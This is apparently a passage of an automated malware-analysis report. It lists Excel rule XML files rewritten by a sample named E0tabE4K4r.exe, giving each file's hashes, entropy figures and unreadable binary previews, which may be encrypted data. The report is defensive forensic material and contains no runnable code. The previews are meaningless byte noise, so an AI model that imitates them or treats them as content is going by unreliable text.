                                                                                                                                                  Preview:<?xml....g.....R..!.... .....g..p5..D4b.4...K.Cs.A.[....6...j3.yh..0.j.C..a.|.F..,[o^N.D_.e.)<.G...Y3.?A.'!r..)..6..........\....-eX..b./c..<..7...7.\...%...h..p....~..]..i.....GLq.5xZ....[>5..q.k-.-..}.......4W^.h...,.)lX....B~y...b..}...#./.,.s..H...aN..2O`...k.%.G{...]...2...4.y.]"C...r.`.._#..a-lV..7pQ...J7. T];ym..$Q..&7...|.L....DuD.7....o.........Q|E!M.....02.\.i]..6..h...k...'...6$..`l}.(+5.%4O....,.9....B.>..da...y.;c.e8...c..g..B..r.U..dO.W....x...v...r'....DY.U_R6".*(...".l...6^....-e...y....oL.-6....y.a6.C.}....h.BLb\.......e.}.n..Y.Q..a..Y...<....I.K.s.../....+(..y.+b..@..C.1......8......0.. ......X.\.3.S3B.QA.i.X.>X.S..w......Y...->...".{.I.LO}....L.\.M.ZQ@.....i.a.w.#.r.u.p..K..]....x...d...8'x.4N..M-.$.b..}..t,'.,c2.........^..5=1..pL|...;..;{s[.LVumMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11932v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3566
                                                                                                                                                  Entropy (8bit):7.945343293009308
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:RCGzKazR7x7LO4BOmm6qGa/uzivUqspzwfvRPFbG2uYYG+/OYhsQS+osJznRv8Db:RCl+7xPO4BHp3O11ps2ub/OCJqey/
                                                                                                                                                  MD5:36509F75E75B6FC8FF4796CB78E10B3B
                                                                                                                                                  SHA1:46361D8BCDFA074E3D0A51FE68534E938EA13244
                                                                                                                                                  SHA-256:3F495E6A373E728D6AD74C5D5E7AB7325B16E423F6703FF33B4C826E350FBBDE
                                                                                                                                                  SHA-512:5E5863102B5A0A4671606A4DCD8EAC3F0A3177AA6524A5241224A8CAD05DCB069D70255AECC3CCC0C5411DE495F3E4096ECBEF0A8354F7FA6F012D848F6F1647
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml!.....2.+Nk....j...lY.>...........K`....D.$z........d.B...>Z.y..cc.e.y^.J.[...6:...l&.R..A...].....^\\.H.....:.W.[..C...|2...=.44.gR..T.2._...[.....{4Ba...R(cFv,>.aya-...M.(?.qM.].}...G.$t......^I6....M.........em.N.....TqD.e.v..B\l..&W.%l..Cl~..A.cE.......d.S.M.....u~w%6..O<...V.\.....$... .N7CV.jU...?3DV.i...!..&j....y2.z.Nci..F./=.....\0.<.....vO..E..:.O...$.>.CZZI.....C..#.` ..O..V.....1..a..X.*{.1.r.)......`.#2%N...1....v'.z4.J.......G..^...HRw.F..*N.Bz0.,..0/....fw..$'......xR.*p.&~,..+...k....)...D..Kt.9.........9a.........x,..4.....i7..k.....X....u.M..d{P.T.....'.9i"Q.....bq..T..h.....S.tK.n >>.9.....E...U...\..h.\\h7..+...bB:(.l8......TvfCB.Z.J...o.......L&|t...v.D.....k.].S~.]]....8...f....5.....E....i.y.h....2..6_..rr4i.ek( ..&..0(.R.._(..e....*...SjR..Q..F._R...'......R[:.r..6].id`..Vf..r..t..X]..1vU._.......Qm...#(.a.}..p....,.r..4...:..KGP.+..qp.$.%_..a.(..WG$.l..f..1...4.C..*V2....H......Hgs.o...).m1..N..AO.?.-.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11933v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3677
                                                                                                                                                  Entropy (8bit):7.948700748483922
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:0JGsNi45lANiiPQ7/jyk1Sg25r4iLrUXhaEEy2H:0JGIFH30Q7/jyDr7UXUy2H
                                                                                                                                                  MD5:20478A4C0E142D855F1E318E7F41CE07
                                                                                                                                                  SHA1:2017D5B9E2D23A1B73E123C131972FA68D99EC80
                                                                                                                                                  SHA-256:53C5AE2CE274E6F893976C9D8310A276AB56349E442AD9A9BFC0A27D1CC9DF45
                                                                                                                                                  SHA-512:CC0DDF622AE1D1034AD8532B3933FC4E98FC23129438B464360466C0CEA0ED1FB647FDDAC5E6FD0F2524E072878FFBE7A15F4336E4EF30CBBF84D44EFC0A22B7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlsI...]5...hP(...*}.,.j.ekZ,w=#I..gj.VO...".x^...m.........{...z...0....5pX.. ..5.Q:...>zr..~.Qu_.D.yM"sy..n;.'.O.....^.....3yfS..z.V~.kF...;.e.....4h-.tA.....6..8.D@".b..f9^..'.}.e.._F...........g.!A..v~:.u-.7../.~R.}.u.2..x....?.........e......&.?X../l...!.........I.......j~.%v.6i.-.k..k.`\YQL.z..C.y......ps.F...7....n8..yK.R.........T...@.{.:.........e...K..g.qS.h.HS...1&.....lX...W.;D.D1...F.S...)..?../.h..M:TwO...Fn.R.".s.v(.%...DN'.2...J..!.r..O.;bp.y.p ../.+H..M...`...V.Y.v..).$..? 7....5.....O...>.L...e.K.A......Jo$....w....i.nRe.'-.j....b......#M..uJ..k.v......G.z...yn.?.q..<uG...d..S.}kr....."@n.=...F..;..Th.R...........Y.l.J...;6.s..Vi3{.L..k<..f.g.u.@............J....;..?...7/...u.f::t. ........j.L...S.01....!......dm.%..>.o[e.E.&..t.,..;UK.....B..i5i.`^h|.Hj.!!......_K.f.m[..F....}.D....9....}..L.s.K..q.)....;=.Z...9.f`.9..,..=.[m.@v$....-.l....i.q~>D...z.m1].[.......p....qB..R>..M...P....].(...K&x......#.9...j../Fw

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11939v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):744
                                                                                                                                                  Entropy (8bit):7.709916125421163
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:eyGG8wHav2kLuf3N/Gd08aUX5bu4nkbcahGhq81k1CJs8yerrSUdNcii9a:T8wHgDLQ9C08aUpbkbnkqSk1csvh2bD
                                                                                                                                                  MD5:49964DAA065FEEA992C62CC894B14391
                                                                                                                                                  SHA1:DC3B5211DB2F7D4F44C2AA1D73574D45C6A6C1DB
                                                                                                                                                  SHA-256:A7AAB2B6DA4FD472BA2C6C4099CE38FAD07FE32ADEF0A61C66FE3ED87473BB94
                                                                                                                                                  SHA-512:7B9E6D8995DDECBBE86F76ED24705D7DBF895E78F84095A56928B5B03C640418CF8809386A4FFAE0F1B55FF4BB42C3114A470B5D573FE17E2357C1A927F860C2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml3:.K......`2..!.xtb....?.e.....lL.j.{6..6...j.O...........R|...T.....HGV.-..._..Ol....7...1...m0..'..9 .'a..bor..E.%.G...,I.....i...:.s...+?.".`."....L.Y...w@8ba..0.M...J...........5.:..O...M......:{l...R......^..).)U.Mqk.s......l9......T<.w)..x..V.?...~.........../..|;...7i.....(..=..........B@rD.miZ.Vj"..i/.....~.jz....qI.......U........)A....w.x6../T....~.....u./..m....a.....i.@:..p...g....Z.^..Yht.v.....nX..W....z].....]qe.~.....!.....`[/{.F/.w..&C...s.@....egx.[.c.6_.H}W(..(..n4.H%.M...Tb..F..Le5.......X._..ciW...S.F..U..qS...e*(.,.6...'...P...IM...qB9=..,0.#kM....G_..h...L.... n.....J.TN....>3.......#E..A....AmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11950v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1620
                                                                                                                                                  Entropy (8bit):7.8801925798194885
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:11O4AQi9Ir1kUkl8Hl0zPyUsE8OiuSURhI9NXC/eSX0whg+Bj1UjypFDLdAiAo2X:1I4AQiySla6P8OiOeXCxX0wvj1MLD
                                                                                                                                                  MD5:2594C2A662C726AA39D7D520116A3885
                                                                                                                                                  SHA1:F7B6B0B8885694230C4F68B9396F194DD472A57A
                                                                                                                                                  SHA-256:2A311187A481C1D7A2D437A5A5EC306CFA170A2E9B977098862FBCF654FAA157
                                                                                                                                                  SHA-512:CCAF81E782EBAF742BD44A49347703AECB995084D5B84EE5BC9D528BE3237361177094BAB5432AF0842C3225D9B6AAD16DFB09DD5762E6A5890DCC7651203CCA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..!..X%.e@.R.. .O&.7?3.U*..8.g.....9a.....;([..vc.(.:...p...}...[...t..4.t....Qje...M.>.d.k..?.).o....a..1?..6..@.LF.E...=+..A.<..[....F.....@..t.I.......4....J.!...$.Ml..g.......~.......-.....w..vS..~..M..8y..l..".4.z{.M.m..=.].....+.`.Di...%.Z..x.C.8`....{E.y.>._>..b^.ad..T.<.>+.8O..l.W.x./..`.Z....L......YQ8.U..{..\)h....1m."..=.iY..#.I.?.3.......^..n.uSC.Nx.`..AC-..e\=.9.;.v.[.By..Wux+.#..fq..........V.9.E.u.E=.9.1_.m.../..E.....!.FG......O>E5..0.9J.=Y@Yz(.{.(i....x..T.'i...%...i.H..h.....~e..E,N~......W.!5.....G..>.Ud..>E..%...T...6...I...w....`.R]r>..:....Mf9....5Oq]y.*..K........o...#..h.6>}.P.Z1...=..#....h.kf...'...R.7W.!.....Gr.[E$a$h.-*q2..w...2..(]..}|....C..[.+0@.W.8.[.R..m..C.8.....~...FT....p[..5a..#..tE......^K..&.{.&2..[..n.t.d/......upnq.#.j.|........g...L.....y..l.r....H.yy.....`.......Uz..lA]..CP'.....G.....t..K.q..:@&p3H.`,.....j....(|......?.=.jA.#...h.[.....<?.^..g.k.Ak.K#.q.A.S ....|R<.H......J-sa.3.j..$..r.q0

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11981v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):821
                                                                                                                                                  Entropy (8bit):7.723075944557182
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gxHAIVr/cpwWDxZPg/XfJn7qp+AU5PH2bD:gxHBr0pwaToPhNVKD
                                                                                                                                                  MD5:3607C212A98BED7850F480E6B07E3596
                                                                                                                                                  SHA1:9D6C22C34DD37223F089EFC41B76F519B933DEA5
                                                                                                                                                  SHA-256:127726BF39B632A913C5BF21590B8E9EA9555099091DA00816FEAE63F8AF67F5
                                                                                                                                                  SHA-512:5DBC24796008BBD195BB67086FF5535EC9B03A447BCA90FE4B1544F8F0A6968F92E06DD97627ADDC1518F4ECD36D13CC2EE450931A2024990D3DAD8F2AEC76EA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.e..*...^..P!.... ...I.,...4M.`.....U.....T...P.1.oK.1..$u...{.{2..wS.sO.FYa.l.;..+.w.Q....Mq\.l&cF~....^..{.xE...l......Kd.7\....N..M...V..I...^.bP[.&%.+...J.L~.>........R..u~W......"........AB.e@/".P.....^.....CbC.S.46Lc.....uW....M....^..>......._....$._E....@..G..AN...Q..r....<..^....wP......|.al..q..$;.......?..(rJ........DN.=..+d..`K...r{.]/....\..3@2.}.gr.h.....8.Y..S...F......<.Mrr.1E.....^88.d..y/H..!..w....D.>..a.R@...g._..2......I.A.U.y[.....V..P.)Y....u.s.m....{..O).|.+.....#.(..#9O.LFqa...I.$..}K.3=.:yw..^r.%..WH.....%YH....HWL..l"..g.<.h..'.t.._[).;..7.....& rcD......D*k.:&....^.{*wP.>.B..!C....2J.M..E~E.f.."{.r.P._..m..0..n.|H.K......$.VMV0;3..V.8...M.s5....3....&fx..m..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11989v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1034
                                                                                                                                                  Entropy (8bit):7.800832395336645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:S9/gMMY4UJCQ66qVEydDWZ78Tou50fgHt1nP8JGQ+7UM2bD:QGY4UIQW19e7E04H3nPWGQ+4fD
                                                                                                                                                  MD5:4F96319FE32149818A02BEBE4CEBDA70
                                                                                                                                                  SHA1:93B54F4F48DFEA918D99368B45E3761ECF7679A9
                                                                                                                                                  SHA-256:1EE6C5AC8674978C6392D4B2FF36091744C41793597820AA58E6E6E9EDECF155
                                                                                                                                                  SHA-512:B14709D6D7FB12044A2D87B9B563F3530C1A9EE3A4DBB4C4C110F17F9F0B440377EEDC87D6CC0B4F9192A3246BCBFDCA8BA674150F9519595F19AE18304543D9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..|..a.....S.....am...g.F..~r.B....KX..a..?..0{.U.Q.L...k..u......D.....s5..5.x...-'E..gF0y.....Q.....fEY..jri.../'v."1......IP...]....wlD....>R...I.N.>..C j.m!I.s...s..a..<z..j.d...W.....>g...K..:e.nE..[.g....J.B.p....Q.T..:..1.....x:.Hhm..L...Fg9..K.........X..........E.... =...L.Vs.......G.h.)x..=/.N3...Nqlm>$t u.nG.R....L..l...v...TQ..)...........E..?...`...[.!N.osgX.|.;p...v......W..ZK..8M...=...../...01.f3../......t.W?2.:n........j....h.......a o...>=.7...u..^..d......lX.mGc...?j.P4.....A_M.G.s.v.....Y....y.......q......+...LM..i5..%.C2.qE.h..3..jj.d.2....@[.d...H.0C8.:.(.h.......q.K~i.zL.h............;..DE...f..6........"....Q..tm.iT.C]uB,..;LM.g...G....d.kk.+~./.9.=..`...s.KQ)>...?........L...7.\.#X..z..~.L.....2..]......e.].....C...Tp.O....u7..&..#T{;.w...T2.0..R.)oF.47x..D.0.l.I......0o.'.U....^.."c).....e.q##..+...4.#ot.F....$2{..]../v.Z.y.3..l....L.'..>..iB\s...W9.$mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120100v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1333
                                                                                                                                                  Entropy (8bit):7.836032767949343
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:jZQOFXfsmhYb59EZQzifsZkgBeE1N+UKbAKiJnPJUbMnmoAj1KU2gG1V2bD:j6q04YdKZB06JE1N+7xuPJUbjoAjStuD
                                                                                                                                                  MD5:79A6A2B69834448006F2BC04C6E5865A
                                                                                                                                                  SHA1:ED174E96E7FCD755CA85B6A756610544BD9CDF1C
                                                                                                                                                  SHA-256:CEE29451345E878537E73DB2F2085DBA3C710856CD7CFDE5915914F8E9FEC647
                                                                                                                                                  SHA-512:F92CD66E4CAF728B2EF6209D9DD9B213E1C569DA47FE3B20952EA5438EA39EA1BD2BA65E7FCC1062C77153EE2E20DA840407C3E335EA0D33AA11421E62E08A61
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....a...XD.....ku.']v.1C...<..)Y...|v.@.,...kn.9......V.J&..yk.9...=.Q.oF@K..._2....gyZ&.I...2........).\(...a.......F\.......4....1..:.WUE...%^.%.u.?LW..~.<hR[....q.<....3PQ...S.e.H.p....qE..i.J.f.........2D.GC|..]../(v...b..9.*n...n...H..`U.U..2fA..c...N..cI.U%.+....xF...0<~Mr...".......G=8..R..g....D.A(.VY_W..e,j.5..<.......mb`.l....Gr8.4.P...BU~(.u..6..G..u........l.........x....i...gti..v2...o...5\..Cw._J......{g........r.i..!.PY...i.0...z..x.V.,^...A-.q..]..J.P..O..wG.Wo.SBm...92:f..(..`..)........)..........S...G..../.i.o.......1..t~o.].B.y~.DH...Z4....xh....z':.s..9...+6......\.+...Bz..\mH.H.P......M..A.....K...7....h...T..CE.Q...%.dI.$..k....WL]e.....,V....k.......2...[..[Q0N....0DBF..R.7..l.h.o~96.D.#..y.-{k2..7...s.........q..Y.o....5=.......7|.n6...Ps."Nx6..z..uB&ag...&.....L.\........|.4.DP,........+.8..Y...).x..f.4....g......U...a.xP0.sx.w..e..>.".A....6...3V..2..tL.y.....m}..6rc..~.^k........X...~..B. R...|..I...V]..zr?O.5.k.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120107v6.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2514
                                                                                                                                                  Entropy (8bit):7.916286725483102
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:WggNHgAtye9/DG2usmdRDfIyKDGaakipimAeCD6mLiw69EupD:WtHgAtX9/DLusmdxIyKDDakipimAzDfE
                                                                                                                                                  MD5:58A9AF3F76E6AFF1EDB9D6351CE30CFC
                                                                                                                                                  SHA1:6454B91C439373B5D29C1BC8C0ADA258007781E1
                                                                                                                                                  SHA-256:04E9F9EE9F5C9B2A136C385B27CCF90EA93EEF5E3BD2553F8A889C42CF00EA03
                                                                                                                                                  SHA-512:A996E83BF03C4E58F4A16F46B0F2999ED9FD1F5DA51E3C5C98CA99B41FF38E97DCE0D78A9D000E00AEEF25B78FFECDDD805B2E314CD28EA59ACCE20FF4438A2A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..?.,.c.....n.BT...^XG.e..=....v..@........c.5..{....?ERk .z..]b%h....O.p...f.L.2X4......q.AI.T.#.....d...))*.j...7...M.}.b.".....:..x..Y.r...N.nz..Q.z..%..v.`..YY.......o..... X.Z.....r.o.8&.../.".i<D.MK."3..i7.D.hi...k}........'./3..&........]V..k.*~....<.1..o...1p.`...h...u^[..H7L..'.....B.H.m.f.Z......O...K....o%..............&92X.:...4-@.c....K!..]...^N^$B."..*.j..v\...3....8...x......i0..2..p..V.G|..|.L..0..2.V..m.....`.....G.......<...!.:......\Z...H...T......81F:..6.].O..c...#..g..MJ.e.._...A...%@...SK...6.. ...P._..BD..U.r|.v...u.'..k$.m.. ....(...Kz..Jk.............)u....&. ..{....].s..t.?...b....cS..`P..N.......9.].....:....}:..M[.5v.....,,J.q.s...z.. ._.o,.i...8..j..EI.Q29..$........MZ...O.S....}Ix..|)eA.zNW..}.Z.Q....v......l=.Y.......R.!.....k....e.5}"..]8...![$....I.s5........'^..N../W....4..,z..c....E3.zmS\......1.b3.i:R...hfks...O.....s....)-t.~.\T.. .*@+.....6(._.G8U......{p.M0..B.5$s.../.L.z..686...(.....u..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120110v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1346
                                                                                                                                                  Entropy (8bit):7.879940107647821
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FsnKw0ECp/5LUnBDsOt0HKly/5c+qIpihk9U58CbUBxDVegmvlmAk0WFgCrND2bD:iKw01/56YKlK5cmih78UONZYIAk0WuCm
                                                                                                                                                  MD5:824254003F6EDC1168647A65233A94DB
                                                                                                                                                  SHA1:A092BE7E3D898EEB0965FB0EE344790C297A1266
                                                                                                                                                  SHA-256:C8E7A639B703A5A673839F355E958BD4A11B50DB8DBCE0F0E38D7836214BE03A
                                                                                                                                                  SHA-512:2FA3643587C4EF5C3BC1A1AB24A5D2D215F4F1FA7E855CF78C69EDDD0B4E1897BB729D69EF34C1F2295682B0D9FC192FD7D33DA87EF9B819E6258052EDFDE7B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....[R'.../.+..|.....)B.}.b.......L.R...h......'5....;>..T...*..$...M...uK..........g.....5..Tq..e.qa.\.2..O........d.r_...l......R.\.o..&.ed_...........-...Y...ZU......1. ee...yA.u.)..A.\.E..~.{g;.|....7........?.8.2..%V.^....2.&..$.g|...b.O[.."....>.+...q..@.}ja..P. ~.:.'^.Tj4 .#...g...pD.r...j/.."..NZ.uq...(.9b...........z.R^..f...i.Vl.....[1.)..Q..^..p.@.G...Qe).v[#...:...P..W./.Z6.R....=.$>.. h..=d.]9.W.v)....E.....h...c....-8.D....s.Xsi..!..'P.{Q..^-|...~.t.P....=.$.&...e...W2%`...\.*..8....o..`DZ.O.......S.i.+W.0U8.........n.a..m.Y....-..xW.....X..{`]...........hPi#l...)v.....9.h..C.......&p..7/W.\X...`.Y.......H<x.$~o.Z2H.i..<..H..5......F|..U.(...dl....ax..4.@5..].......<..q.....0,....4D.=......|..w....lm.....q..O(# .y....z.E.%./i.....0.bO&.......(N..........G...$..j.M'..1:.:..X.."..n..e..(Z.y....QN....F..9.n....I.As\$..k.F=a.c....D........P.As...q.^T..K..L%...B.X<V.... ........Vw4n..BR.@Q.r..=...1..w.m...b.e..s...>.7.9...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120112v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1041
                                                                                                                                                  Entropy (8bit):7.830210583567373
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:n0yVfNjrm+A+qiKO7eNhLkfkdGW5ccFfkqC1zdtkEtZg2bD:n0y5tm+qiKyEEFqCzd1ND
                                                                                                                                                  MD5:62ADFCBEDB85E53979875B52C0B700CD
                                                                                                                                                  SHA1:65C661083BDB70BE85DA462DE4CAC1748784EFA5
                                                                                                                                                  SHA-256:589A673D8F0A6C9C1A58C7B1E5CD50807D3BF17476B2DBD54ECF98399C11C3DA
                                                                                                                                                  SHA-512:DE63270AB115BF6D9E65A20A767F85A67A28BB53D24B7728E75A2AE3B47CE2760FF97A108C349DBF7DC9A5C2E5121D30598E59F8BAC35776B76335792DCCA97C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlC..............Y=<$g.\.....e.....@...g!.^xswnF..7.>..!...=I@.q.........F...... ...9D..l.1...5dkk}N....'/-...H.q.>dn..[...9.~...'.\?.:...'.6_Y)t...$.vwb..F...a......1].^...ja.|.D.....E../$,=?..=(....I.=j.j:Y...m.7.\.+.ko;..:..m...%...KNv."..Rs.-f.w....0..5.......ki....i.....C..{`nv..p..!...:R..`.......I..-.+..h.V..x.CL..n.]...z32a.H.C.F.K..;.>.LQs.#c.S...$.c6.;....12.E...."s)...T.,X.Q..I.r...7*.1.....q.|....|..2.....78..........3L|,h.....q%.`}..lR...Ms.-..S.Q.....J....]Fc..~... ......(..o.,....NN4w..Z=q...x)K.j...S..+...b...h..,[+....2.....f.....!.%....X...?%..[..y?.#.?'[.7.6..3.e[."0..@x...L.0..}6.Z...g.^.....hI|.Dmsj..O.*.9.T.y.2U.}..(.Z...d.Ke./wB8.oqW(E..q.)).0ts.G..u....}`H...-....^.._....hu.6;......I...(..-r..*JO.i.I..p.O..(.......S..'..cA..id...#.......F.n...V....S4...f.6..sr..bZ..@F\.......8`..c...z.ad.S.5~.NL...q..O.....`.....{R...z.>..y~_.j_..s...C...Z.....i3c.wB......-{(.#..M..!E...x.@[t....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgj

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120119v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1664
                                                                                                                                                  Entropy (8bit):7.893050733842709
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:TLnsvDptRNV9KCmRr4xicdwvMmhsZ4C7oZTRU9M5a3u5Q6qZCxaRTDA2bD:3kRBKzRr2lCEll6iSoumca5vD
                                                                                                                                                  MD5:3AEBE0D08AA8EA982EB0DC39B4AE41AF
                                                                                                                                                  SHA1:8F083FD43741015FFF4AB755B35ABDC33AC91160
                                                                                                                                                  SHA-256:213C558AB36088B7A3713A5CF94048C7FE657B354049B2BB423DF6AE6E13C382
                                                                                                                                                  SHA-512:430D085083CE32DB66432B2D7928D5A55DDAA4DADA10EC1891B43ED591D509CBE062525B595B6F0FF14D510DD5A8FF881FB76DA2C484A3D261D6865997A98AD8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......@t..\.)T,.N.&36f...}"...s...r...........6QK...8.G..'.P.kt....'..`.. ........t..6h..gJ.(.0...{.>...+...2C..@:7.(..@.?....rZ..8.)KR......[ 2n..C9N.\.v..=a.1..*..c..9O.?>...:..WK.`zz`Zk..96p$..IL.'Q...V..E.#9!%...H...E....-....eY.B...."Q'.'..\..x.......#..r...Jg-9..k6.%g....W~....p..$#X~..v...gi50UY@..(.{w.}0l...Kf....,z.9o.7|...............?.ba...w..9..3K..W..,(k&....C.g...X|A.E.X.bt.g...#......R.....q.....r.m...h.t.:......H .UU.2.....F<..8..4.6uC....!..w...z~;..vc.........\......kp..p.T.a..;,D...=.,...qA..&.hm..n(.M....d.S..L..r.W....%....x|.).,D.KLI35...I..c.^..S........*.....}...%Lq~X\.}......yb..N....W...B...Cy..........6k.e...(.5.P.v._{P.....vK..:|.....p.J.}._A.A-7..%....z~r..%.-B...k{.~.0z|1;..D.a..4...3..,w,../l.+...b.S0..@.(....M.........[M..[.!..~P...r...2n.v*d........g._.....Y..G(h..*EJU.<.....;.0....X.>...ieD[.....u..C.5.._.M...M...5.......I...;...=.....}L.(.....`.y...x.?..p..y..r$...a..?jp.z..t...%...N

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120120v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1195
                                                                                                                                                  Entropy (8bit):7.819385175609444
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:olQJi7KhAsP968mNZZb1FiignYo8PEG71bOWlAkm2bD:olQJi7KK0Hm/FizYoW1bOWlXD
                                                                                                                                                  MD5:7A83E4FE55FD219A446A1B54FCAA442D
                                                                                                                                                  SHA1:7C4590CCD893912DC551E4492074621AFD064AC9
                                                                                                                                                  SHA-256:A375EC835E69EC981F0829FFECBF58C5DBA72678AB5BF6F8C0742B9D845BA03F
                                                                                                                                                  SHA-512:2BD3A9E3883CEAF843AAACB4794F497E55D219DE4791D7CF03837CAB9999A4009AD7C921C9D016FBB88337D983ED32374C75FF1EC46431D218418BA7297712F2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....,...f..nv..!J.....:FM..l...._D.....dh5l.U.mW...,B.;S..j.J...j....o...M.......7m.'..3.>.A4.N.=.....S....;....9. .`>..@@......#Tb%C.0~'%{.....u...v.g..5P.h./>y...H......B....X&....y@@....D.<C...s._Z....`M?.C..7.,U...Ng~.G....C...u....s...T...l..x%...t.*..g.'0Gz@.u.}..r.S..X..J..kG.GoD}p.._Y.q..C....}"gnfzV.,....S.6@6[..1.....I.x.6..ue.30.y..jc......G.g&...X...N...jd.......O.]...b..^...H.....8..2c@;.:TU.....4...%.4....(...G.C....?.....tC....=d.....F7..9..../.......&Y.Nn%V[....).....3......".E...b8..*S%2.gn..,...~.6...9.>..HG-;.}.P...M..m%75V......V...9^...$6..T.0oQ...^,.z.\....eP.%D.6=....1.....z..br...S.[^.^...C..@QQ....$...Y.i./..=L..q...2.88..:...u.$g.d.c.,..5...a<Yi\r)...E..D.......K..E..k;.g..l..:8....NB.....2.$...pI$H..v..T`i.......AY..}@k..S...!.Q,...sB..<.....z..qm....4....hx.a^p.^.0...<.%+.9....{..........R.Xwf....\...Xg...M.N......7....\Y.O.W..G.y....c2E..qU.Ln$...Si#.4.4..a....2...; ......../.... .i..wS..hB.T.....M

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120125v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
